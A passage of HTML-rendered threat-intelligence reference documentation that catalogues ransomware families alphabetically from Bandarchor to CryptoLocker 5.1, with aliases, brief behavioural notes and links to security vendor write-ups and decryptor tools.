<p>Bandarchor is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Rakhni</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1913. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://reaqta.com/2016/03/bandarchor-ransomware-still-active/">https://reaqta.com/2016/03/bandarchor-ransomware-still-active/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/new-bandarchor-ransomware-variant-spreads-via-malvertising-on-adult-sites/">https://www.bleepingcomputer.com/news/security/new-bandarchor-ransomware-variant-spreads-via-malvertising-on-adult-sites/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bart"><a class="anchor" href="#_bart"></a><a class="link" href="#_bart">Bart</a></h3>
<div class="paragraph">
<p>Ransomware Possible affiliations with RockLoader, Locky and Dridex</p>
</div>
<div class="paragraph">
<p>Bart is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BaCrypt</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1914. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://now.avg.com/barts-shenanigans-are-no-match-for-avg/">http://now.avg.com/barts-shenanigans-are-no-match-for-avg/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://phishme.com/rockloader-downloading-new-ransomware-bart/">http://phishme.com/rockloader-downloading-new-ransomware-bart/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/New-Bart-Ransomware-from-Threat-Actors-Spreading-Dridex-and-Locky">https://www.proofpoint.com/us/threat-insight/post/New-Bart-Ransomware-from-Threat-Actors-Spreading-Dridex-and-Locky</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bitcryptor"><a class="anchor" href="#_bitcryptor"></a><a class="link" href="#_bitcryptor">BitCryptor</a></h3>
<div class="paragraph">
<p>Ransomware Has a GUI. CryptoGraphic Locker family. Newer CoinVault variant.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1915. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://noransom.kaspersky.com/">https://noransom.kaspersky.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bitstak"><a class="anchor" href="#_bitstak"></a><a class="link" href="#_bitstak">BitStak</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1916. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://download.bleepingcomputer.com/demonslay335/BitStakDecrypter.zip">https://download.bleepingcomputer.com/demonslay335/BitStakDecrypter.zip</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blackshades_crypter"><a class="anchor" href="#_blackshades_crypter"></a><a class="link" href="#_blackshades_crypter">BlackShades Crypter</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>BlackShades Crypter is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SilentShade</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1917. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://nyxbone.com/malware/BlackShades.html">http://nyxbone.com/malware/BlackShades.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blocatto"><a class="anchor" href="#_blocatto"></a><a class="link" href="#_blocatto">Blocatto</a></h3>
<div class="paragraph">
<p>Ransomware Based on HiddenTear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1918. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/614456/bloccato-ransomware-bloccato-help-support-leggi-questo-filetxt/">http://www.bleepingcomputer.com/forums/t/614456/bloccato-ransomware-bloccato-help-support-leggi-questo-filetxt/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_booyah"><a class="anchor" href="#_booyah"></a><a class="link" href="#_booyah">Booyah</a></h3>
<div class="paragraph">
<p>Ransomware EXE was replaced to neutralize threat</p>
</div>
<div class="paragraph">
<p>Booyah is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Salami</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_brazilian"><a class="anchor" href="#_brazilian"></a><a class="link" href="#_brazilian">Brazilian</a></h3>
<div class="paragraph">
<p>Ransomware Based on EDA2</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1919. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/brazilianRansom.html">http://www.nyxbone.com/malware/brazilianRansom.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/images/articulos/malware/brazilianRansom/0.png">http://www.nyxbone.com/images/articulos/malware/brazilianRansom/0.png</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_brazilian_globe"><a class="anchor" href="#_brazilian_globe"></a><a class="link" href="#_brazilian_globe">Brazilian Globe</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1920. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/821831437884211201">https://twitter.com/JakubKroustek/status/821831437884211201</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_brlock"><a class="anchor" href="#_brlock"></a><a class="link" href="#_brlock">BrLock</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1921. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/ransomware-explosion-continues-cryptflle2-brlock-mm-locker-discovered">https://www.proofpoint.com/us/threat-insight/post/ransomware-explosion-continues-cryptflle2-brlock-mm-locker-discovered</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_browlock"><a class="anchor" href="#_browlock"></a><a class="link" href="#_browlock">Browlock</a></h3>
<div class="paragraph">
<p>Ransomware no local encryption, browser only</p>
</div>
</div>
<div class="sect2">
<h3 id="_btcware_related_to_new_version_of_cryptxxx"><a class="anchor" href="#_btcware_related_to_new_version_of_cryptxxx"></a><a class="link" href="#_btcware_related_to_new_version_of_cryptxxx">BTCWare Related to / new version of CryptXXX</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1922. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/845199679340011520">https://twitter.com/malwrhunterteam/status/845199679340011520</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bucbi"><a class="anchor" href="#_bucbi"></a><a class="link" href="#_bucbi">Bucbi</a></h3>
<div class="paragraph">
<p>Ransomware no file name change, no extension</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1923. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/05/unit42-bucbi-ransomware-is-back-with-a-ukrainian-makeover/">http://researchcenter.paloaltonetworks.com/2016/05/unit42-bucbi-ransomware-is-back-with-a-ukrainian-makeover/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_buyunlockcode"><a class="anchor" href="#_buyunlockcode"></a><a class="link" href="#_buyunlockcode">BuyUnlockCode</a></h3>
<div class="paragraph">
<p>Ransomware Does not delete Shadow Copies</p>
</div>
</div>
<div class="sect2">
<h3 id="_central_security_treatment_organization"><a class="anchor" href="#_central_security_treatment_organization"></a><a class="link" href="#_central_security_treatment_organization">Central Security Treatment Organization</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1924. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/625820/central-security-treatment-organization-ransomware-help-topic-cry-extension/">http://www.bleepingcomputer.com/forums/t/625820/central-security-treatment-organization-ransomware-help-topic-cry-extension/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cerber"><a class="anchor" href="#_cerber"></a><a class="link" href="#_cerber">Cerber</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>Cerber is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CRBR ENCRYPTOR</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1925. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.org/threat-analysis/2016/03/cerber-ransomware-new-but-mature/">https://blog.malwarebytes.org/threat-analysis/2016/03/cerber-ransomware-new-but-mature/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://community.rsa.com/community/products/netwitness/blog/2016/11/04/the-evolution-of-cerber-v410">https://community.rsa.com/community/products/netwitness/blog/2016/11/04/the-evolution-of-cerber-v410</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/cerber-renames-itself-as-crbr-encryptor-to-be-a-pita/">https://www.bleepingcomputer.com/news/security/cerber-renames-itself-as-crbr-encryptor-to-be-a-pita/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_chimera"><a class="anchor" href="#_chimera"></a><a class="link" href="#_chimera">Chimera</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1926. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/chimera-ransomware-decryption-keys-released-by-petya-devs/">http://www.bleepingcomputer.com/news/security/chimera-ransomware-decryption-keys-released-by-petya-devs/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.org/threat-analysis/2015/12/inside-chimera-ransomware-the-first-doxingware-in-wild/">https://blog.malwarebytes.org/threat-analysis/2015/12/inside-chimera-ransomware-the-first-doxingware-in-wild/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_clock"><a class="anchor" href="#_clock"></a><a class="link" href="#_clock">Clock</a></h3>
<div class="paragraph">
<p>Ransomware Does not encrypt anything</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1927. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/794956809866018816">https://twitter.com/JakubKroustek/status/794956809866018816</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_coinvault"><a class="anchor" href="#_coinvault"></a><a class="link" href="#_coinvault">CoinVault</a></h3>
<div class="paragraph">
<p>Ransomware CryptoGraphic Locker family. Has a GUI. Do not confuse with CrypVault!</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1928. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://noransom.kaspersky.com/">https://noransom.kaspersky.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_coverton"><a class="anchor" href="#_coverton"></a><a class="link" href="#_coverton">Coverton</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1929. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/paying-the-coverton-ransomware-may-not-get-your-data-back/">http://www.bleepingcomputer.com/news/security/paying-the-coverton-ransomware-may-not-get-your-data-back/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryaki"><a class="anchor" href="#_cryaki"></a><a class="link" href="#_cryaki">Cryaki</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1930. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.kaspersky.com/viruses/disinfection/8547">https://support.kaspersky.com/viruses/disinfection/8547</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crybola"><a class="anchor" href="#_crybola"></a><a class="link" href="#_crybola">Crybola</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1931. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.kaspersky.com/viruses/disinfection/8547">https://support.kaspersky.com/viruses/disinfection/8547</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryfile"><a class="anchor" href="#_cryfile"></a><a class="link" href="#_cryfile">CryFile</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1932. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">SHTODELATVAM.txt[SHTODELATVAM.txt]</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Instructionaga.txt[Instructionaga.txt]</p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crylocker"><a class="anchor" href="#_crylocker"></a><a class="link" href="#_crylocker">CryLocker</a></h3>
<div class="paragraph">
<p>Ransomware Identifies victim locations w/Google Maps API</p>
</div>
<div class="paragraph">
<p>CryLocker is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Cry</p>
</li>
<li>
<p>CSTO</p>
</li>
<li>
<p>Central Security Treatment Organization</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1933. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/the-crylocker-ransomware-communicates-using-udp-and-stores-data-on-imgur-com/">http://www.bleepingcomputer.com/news/security/the-crylocker-ransomware-communicates-using-udp-and-stores-data-on-imgur-com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crypmic"><a class="anchor" href="#_crypmic"></a><a class="link" href="#_crypmic">CrypMIC</a></h3>
<div class="paragraph">
<p>Ransomware CryptXXX clone/spinoff</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1934. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/">http://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crypren"><a class="anchor" href="#_crypren"></a><a class="link" href="#_crypren">Crypren</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1935. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/pekeinfo/DecryptCrypren">https://github.com/pekeinfo/DecryptCrypren</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/Crypren.html">http://www.nyxbone.com/malware/Crypren.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/images/articulos/malware/crypren/0.png">http://www.nyxbone.com/images/articulos/malware/crypren/0.png</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crypt38"><a class="anchor" href="#_crypt38"></a><a class="link" href="#_crypt38">Crypt38</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1936. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://download.bleepingcomputer.com/demonslay335/Crypt38Keygen.zip">https://download.bleepingcomputer.com/demonslay335/Crypt38Keygen.zip</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fortinet.com/2016/06/17/buggy-russian-ransomware-inadvertently-allows-free-decryption">https://blog.fortinet.com/2016/06/17/buggy-russian-ransomware-inadvertently-allows-free-decryption</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crypter"><a class="anchor" href="#_crypter"></a><a class="link" href="#_crypter">Crypter</a></h3>
<div class="paragraph">
<p>Ransomware Does not actually encrypt the files, but simply renames them</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1937. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/jiriatvirlab/status/802554159564062722">https://twitter.com/jiriatvirlab/status/802554159564062722</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptfile2"><a class="anchor" href="#_cryptfile2"></a><a class="link" href="#_cryptfile2">CryptFIle2</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1938. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/ransomware-explosion-continues-cryptflle2-brlock-mm-locker-discovered">https://www.proofpoint.com/us/threat-insight/post/ransomware-explosion-continues-cryptflle2-brlock-mm-locker-discovered</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptinfinite"><a class="anchor" href="#_cryptinfinite"></a><a class="link" href="#_cryptinfinite">CryptInfinite</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1939. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/">https://decrypter.emsisoft.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptobit"><a class="anchor" href="#_cryptobit"></a><a class="link" href="#_cryptobit">CryptoBit</a></h3>
<div class="paragraph">
<p>Ransomware sekretzbel0ngt0us.KEY - do not confuse with CryptorBit.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1940. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.pandasecurity.com/mediacenter/panda-security/cryptobit/">http://www.pandasecurity.com/mediacenter/panda-security/cryptobit/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://news.softpedia.com/news/new-cryptobit-ransomware-could-be-decryptable-503239.shtml">http://news.softpedia.com/news/new-cryptobit-ransomware-could-be-decryptable-503239.shtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptodefense"><a class="anchor" href="#_cryptodefense"></a><a class="link" href="#_cryptodefense">CryptoDefense</a></h3>
<div class="paragraph">
<p>Ransomware no extension change</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1941. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/">https://decrypter.emsisoft.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptofinancial"><a class="anchor" href="#_cryptofinancial"></a><a class="link" href="#_cryptofinancial">CryptoFinancial</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>CryptoFinancial is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Ranscam</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1942. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintel.com/2016/07/ranscam.html">http://blog.talosintel.com/2016/07/ranscam.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://nakedsecurity.sophos.com/2016/07/13/ransomware-that-demands-money-and-gives-you-back-nothing/">https://nakedsecurity.sophos.com/2016/07/13/ransomware-that-demands-money-and-gives-you-back-nothing/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptofortress"><a class="anchor" href="#_cryptofortress"></a><a class="link" href="#_cryptofortress">CryptoFortress</a></h3>
<div class="paragraph">
<p>Ransomware Mimics Torrentlocker. Encrypts only 50% of each file up to 5 MB</p>
</div>
</div>
<div class="sect2">
<h3 id="_cryptographic_locker"><a class="anchor" href="#_cryptographic_locker"></a><a class="link" href="#_cryptographic_locker">CryptoGraphic Locker</a></h3>
<div class="paragraph">
<p>Ransomware Has a GUI. Subvariants: CoinVault BitCryptor</p>
</div>
</div>
<div class="sect2">
<h3 id="_cryptohost"><a class="anchor" href="#_cryptohost"></a><a class="link" href="#_cryptohost">CryptoHost</a></h3>
<div class="paragraph">
<p>Ransomware RAR&#8217;s victim&#8217;s files has a GUI</p>
</div>
<div class="paragraph">
<p>CryptoHost is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Manamecrypt</p>
</li>
<li>
<p>Telograph</p>
</li>
<li>
<p>ROI Locker</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1943. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/">http://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptojoker"><a class="anchor" href="#_cryptojoker"></a><a class="link" href="#_cryptojoker">CryptoJoker</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_cryptolocker"><a class="anchor" href="#_cryptolocker"></a><a class="link" href="#_cryptolocker">CryptoLocker</a></h3>
<div class="paragraph">
<p>Ransomware no longer relevant</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1944. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/executive-perspective/2014/08/your-locker-of-information-for-cryptolocker-decryption.html">https://www.fireeye.com/blog/executive-perspective/2014/08/your-locker-of-information-for-cryptolocker-decryption.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://reaqta.com/2016/04/uncovering-ransomware-distribution-operation-part-2/">https://reaqta.com/2016/04/uncovering-ransomware-distribution-operation-part-2/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptolocker_1_0_0"><a class="anchor" href="#_cryptolocker_1_0_0"></a><a class="link" href="#_cryptolocker_1_0_0">CryptoLocker 1.0.0</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1945. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/839747940122001408">https://twitter.com/malwrhunterteam/status/839747940122001408</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptolocker_5_1"><a class="anchor" href="#_cryptolocker_5_1"></a><a class="link" href="#_cryptolocker_5_1">CryptoLocker 5.1</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1946. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/782890104947867649">https://twitter.com/malwrhunterteam/status/782890104947867649</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
